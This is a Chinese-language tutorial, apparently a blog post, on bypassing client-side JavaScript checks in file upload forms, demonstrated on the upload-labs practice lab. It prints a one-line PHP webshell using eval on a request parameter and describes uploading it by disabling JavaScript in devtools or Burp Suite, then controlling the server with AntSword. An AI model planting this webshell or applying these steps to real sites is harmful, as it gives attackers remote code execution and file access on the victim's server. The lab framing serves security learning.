文件上传漏洞-绕过js验证

1.漏洞原理:

Web应用系统虽然对用户上传的文件进行了校验,但是校验是通过前端javascript代码完成的。由于恶意用户可以对前端javascript进行修改或者是通过抓包软件篡改上传的文件,就会导致基于js的校验很容易被绕过。

2.判断页面是否存在前端绕过js验证

打开开发者工具调试面板,选择网络,然后上传图片文件和非图片文件,然后对这两个文件的变化进行对比,如果网络中没有数据变化,说明存在js前端验证漏洞,如果有变化说明不存在。(有变化说明,前端没有做验证,是把文件传输到后台,在后台进行验证的,所以才会有网络请求。)

这里以upload-labs less1为例,随便上传一个php文件发现网络并没有波动,说明这个拦截是通过前端JavaScript代码完成的。通过图二可以看到,上传正常图片文件网络栏有数据传输,说明有数据向后台发送,说明页面存在js绕过漏洞。

3.创建一个1.php文件(一句话木马):

复制代码
<?php @eval($_REQUEST['666']); ?>

禁用JavaScript

(1)通过开发者工具禁用

(2)通过burpsuit禁用

通过抓包后点击option找到remove all JavaScript

带有木马的文件成功上传到服务器

4.接下来打开蚁剑连接木马

5.发现已经可以看到upload-labs下所有的文件

相关推荐
maizeman1264 分钟前
R语言——分布和公式
开发语言·r语言·公式·随机数·分布
ConardLi7 分钟前
全网最细,一文带你弄懂 MCP 的核心原理!
前端·javascript·人工智能
水w10 分钟前
【Python爬虫】简单案例介绍3
开发语言·爬虫·python·scrapy·beautifulsoup
GOTXX15 分钟前
【Qt】Qt 信号与槽机制全解析
开发语言·数据库·c++·qt·多线程·用户界面
難釋懷16 分钟前
bash的特性-常见的快捷键
开发语言·bash
极客先躯18 分钟前
高级java每日一道面试题-2025年4月08日-微服务篇[Nacos篇]-生产环境中部署Nacos的最佳实践有哪些?
java·开发语言·微服务
威桑26 分钟前
Qt中 Key_Return 与 Key_Enter
开发语言·qt
新时代农民工Top28 分钟前
React + JavaScript 实现可拖拽进度条
前端·javascript·react.js
weixin_3077791340 分钟前
Python Pandas实现导出两个Excel数据集的分组记录数分析
开发语言·python·pandas
King.6241 小时前
行业深度:金融数据治理中的 SQL2API 应用创新
大数据·开发语言·数据库·人工智能·sql·金融